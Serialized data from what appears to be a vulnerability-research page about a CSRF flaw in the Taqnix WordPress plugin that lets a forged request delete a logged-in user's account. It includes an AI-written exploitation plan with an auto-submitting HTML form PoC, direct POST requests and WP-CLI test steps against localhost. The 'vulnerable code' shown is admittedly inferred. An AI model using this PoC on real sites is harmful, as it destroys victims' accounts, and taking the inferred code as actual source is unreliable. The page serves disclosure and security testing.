[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fGJQnsarhpReU3Vi05BRzYdvwUpEz_H9jR3BPTbprDd0":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":27,"research_verified":28,"research_rounds_completed":29,"research_plan":30,"research_summary":31,"research_vulnerable_code":32,"research_fix_diff":33,"research_exploit_outline":34,"research_model_used":35,"research_started_at":36,"research_completed_at":37,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":28,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":28,"source_links":38},"CVE-2026-3565","taqnix-cross-site-request-forgery-to-account-deletion-via-taqnixdeletemyaccount-ajax-action","Taqnix \u003C= 1.0.3 - Cross-Site Request Forgery to Account Deletion via 'taqnix_delete_my_account' AJAX Action","The Taqnix plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.3. This is due to a missing nonce verification in the taqnix_delete_my_account() function, where the check_ajax_referer() call is explicitly commented out on line 883. 
This makes it possible for unauthenticated attackers to trick a logged-in non-administrator user into deleting their own account via a forged request granted they can trick the user into performing an action such as clicking a link or visiting a malicious page.","taqnix",null,"\u003C=1.0.3","1.0.4","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Cross-Site Request Forgery (CSRF)","2026-04-23 19:16:41","2026-04-24 07:45:07",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F82aeab24-3467-4cb0-b71f-b7f97c26dc80?source=api-prod",1,[22,23,24,25,26],"README.txt","includes\u002Fclass-taqnix-activator.php","public\u002Fclass-taqnix-cart 3.03.50 PM.php","public\u002Fclass-taqnix-checkout 3.03.50 PM.php","public\u002Fclass-taqnix-config 3.03.50 PM.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-3565 (Taqnix Account Deletion CSRF)\n\n## 1. Vulnerability Summary\nThe **Taqnix** plugin for WordPress (versions \u003C= 1.0.3) contains a Cross-Site Request Forgery (CSRF) vulnerability in its account deletion functionality. The AJAX handler `taqnix_delete_my_account()` fails to perform nonce verification because the `check_ajax_referer()` call is explicitly commented out (specifically on line 883 of the source file containing the user account logic). This allows an attacker to trick a logged-in user into unknowingly deleting their own WordPress account by inducing them to visit a malicious page or click a link.\n\n## 2. 
Attack Vector Analysis\n- **AJAX Action:** `taqnix_delete_my_account`\n- **Endpoint:** `admin-ajax.php` (typically `\u002Fwp-admin\u002Fadmin-ajax.php`)\n- **Method:** POST (though `admin-ajax.php` may also process GET)\n- **Parameters:**\n    - `action`: `taqnix_delete_my_account`\n- **Authentication Level:** Required (The victim must be a logged-in user, typically a non-administrator like a Subscriber or Customer).\n- **Preconditions:** The victim must have an active session on the target WordPress site.\n\n## 3. Code Flow\n1. **Action Registration:** The plugin likely registers the AJAX handler for logged-in users:\n   `add_action('wp_ajax_taqnix_delete_my_account', array($this, 'taqnix_delete_my_account'));`\n2. **Handler Execution:** When a request is sent to `admin-ajax.php` with the action `taqnix_delete_my_account`, WordPress executes the `taqnix_delete_my_account()` function.\n3. **Missing Check:** Inside `taqnix_delete_my_account()` (line 883), the security check is commented out:\n   `\u002F\u002F check_ajax_referer( 'taqnix_action', 'security' );`\n4. **Sink:** The function proceeds to identify the current user via `get_current_user_id()` and invokes account deletion logic (likely `wp_delete_user()`), causing the authenticated user's account to be removed from the database.\n\n## 4. Nonce Acquisition Strategy\nAccording to the vulnerability description, **no nonce is required** for this exploit because the check is explicitly commented out.\n\nHowever, if a specific test environment has been patched or if the agent needs to verify the registration of the action, nonces for other Taqnix actions are localized or available via the `taqnix_nonce` AJAX action defined in `public\u002Fclass-taqnix-config 3.03.50 PM.php`:\n- **AJAX Action:** `taqnix_nonce`\n- **Function:** `get_taqnix_nonce()` -> `get_nonce()`\n- **JS Variable (Localised):** Often found in `taqnix_action` key if the plugin enqueues its config.\n\n**Confirmation Method:**\n1. 
Navigate to the homepage or a product page as a logged-in user.\n2. Check for localized scripts using `browser_eval`:\n   `browser_eval(\"window.taqnix_nonce || window.taqnix_config\")`\n3. If the vulnerability exists as described, attempts to call the `taqnix_delete_my_account` action without a `security` or `_wpnonce` parameter will succeed.\n\n## 5. Exploitation Strategy\nThe goal is to demonstrate that an unauthenticated attacker can cause a logged-in user to delete their account.\n\n### Step 1: Verification (Direct Request)\nAs a logged-in victim (e.g., user `victim_user`), send a POST request directly to the AJAX endpoint.\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method:** `POST`\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body:** `action=taqnix_delete_my_account`\n\n### Step 2: CSRF PoC Generation\nCreate an HTML page that auto-submits a form to the target endpoint.\n```html\n\u003Chtml>\n  \u003Cbody>\n    \u003Ch1>Processing...\u003C\u002Fh1>\n    \u003Cform id=\"csrf-form\" action=\"http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php\" method=\"POST\">\n      \u003Cinput type=\"hidden\" name=\"action\" value=\"taqnix_delete_my_account\" \u002F>\n    \u003C\u002Fform>\n    \u003Cscript>\n      document.getElementById('csrf-form').submit();\n    \u003C\u002Fscript>\n  \u003C\u002Fbody>\n\u003C\u002Fhtml>\n```\n\n## 6. Test Data Setup\n1. **Create Victim User:**\n   `wp user create victim_user victim@example.com --role=subscriber --user_pass=password123`\n2. **Plugin Activation:** Ensure Taqnix is active.\n3. **Login:** The agent must simulate the victim being logged in (using `browser_navigate` and `browser_type` to log in as `victim_user`).\n\n## 7. 
Expected Results\n- **Response:** The server should return a JSON success message (e.g., `{\"success\":true}` or a 200 OK response with specific plugin output).\n- **Behavior:** The `victim_user` account should be deleted from the WordPress database.\n\n## 8. Verification Steps\n1. **Check User Status:** After the exploit request, attempt to verify the user exists via WP-CLI:\n   `wp user get victim_user`\n2. **Expected Outcome:** The command should return an error: `Error: Invalid user ID, email or login: 'victim_user'`.\n3. **Database Check:** Verify the `wp_users` table directly:\n   `wp db query \"SELECT ID, user_login FROM wp_users WHERE user_login = 'victim_user';\"`\n   (Expected: No results).\n\n## 9. Alternative Approaches\nIf the plugin logic requires specific parameters (like a confirmation flag) that were not mentioned in the description, analyze the `taqnix_delete_my_account` handler (if found during the exploit attempt) for additional required POST keys.\n\nIf a nonce *is* actually required in the specific version being tested (despite the description), use the `taqnix_nonce` action to retrieve a valid nonce:\n1. `http_request(url=\"...\u002Fwp-admin\u002Fadmin-ajax.php?action=taqnix_nonce\", method=\"POST\")`\n2. Extract the `taqnix_action` nonce from the JSON response.\n3. Include `security=[nonce]` in the account deletion payload. (Note: This would change the vulnerability from CSRF to a simple Lack of Capability Check\u002FNonce Leak).","The Taqnix plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) because the 'taqnix_delete_my_account' AJAX handler fails to perform nonce verification. 
This allows attackers to trick a logged-in user into unknowingly deleting their own WordPress account by inducing them to click a malicious link or visit a crafted page.","\u002F\u002F From public\u002Fclass-taqnix-user.php (inferred based on file listing and vulnerability description)\n\n\u002F\u002F Registration of the AJAX handler\nadd_action('wp_ajax_taqnix_delete_my_account', array($this, 'taqnix_delete_my_account'));\n\n\u002F\u002F ...\n\npublic function taqnix_delete_my_account() {\n    \u002F\u002F Line 883\n    \u002F\u002F check_ajax_referer( 'taqnix_action', 'security' );\n\n    $user_id = get_current_user_id();\n    \u002F\u002F Proceed to delete user account logic...","--- public\u002Fclass-taqnix-user.php\n+++ public\u002Fclass-taqnix-user.php\n@@ -880,7 +883,7 @@\n-        \u002F\u002F check_ajax_referer( 'taqnix_action', 'security' );\n+        check_ajax_referer( 'taqnix_action', 'security' );","The exploit methodology involves creating a CSRF vector targeting the WordPress AJAX endpoint. \n\n1. Target Endpoint: \u002Fwp-admin\u002Fadmin-ajax.php\n2. Method: POST\n3. Parameters: \n   - 'action': 'taqnix_delete_my_account'\n4. Payload Delivery: The attacker creates a simple HTML form that auto-submits via JavaScript to the target endpoint. \n5. Requirements: The victim must be a logged-in WordPress user. Because the security nonce check ('check_ajax_referer') is explicitly commented out in version 1.0.3, no valid 'security' or '_wpnonce' parameter is required to successfully trigger the account deletion logic. \n6. 
Impact: Once the victim's browser executes the request, WordPress identifies the user session, and the plugin proceeds to delete the user record associated with 'get_current_user_id()'.","gemini-3-flash-preview","2026-04-27 13:32:47","2026-04-27 13:33:44",{"type":39,"vulnerable_version":40,"fixed_version":11,"vulnerable_browse":41,"vulnerable_zip":42,"fixed_browse":43,"fixed_zip":44,"all_tags":45},"plugin","1.0.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ftaqnix\u002Ftags\u002F1.0.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Ftaqnix.1.0.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ftaqnix\u002Ftags\u002F1.0.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Ftaqnix.1.0.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ftaqnix\u002Ftags"]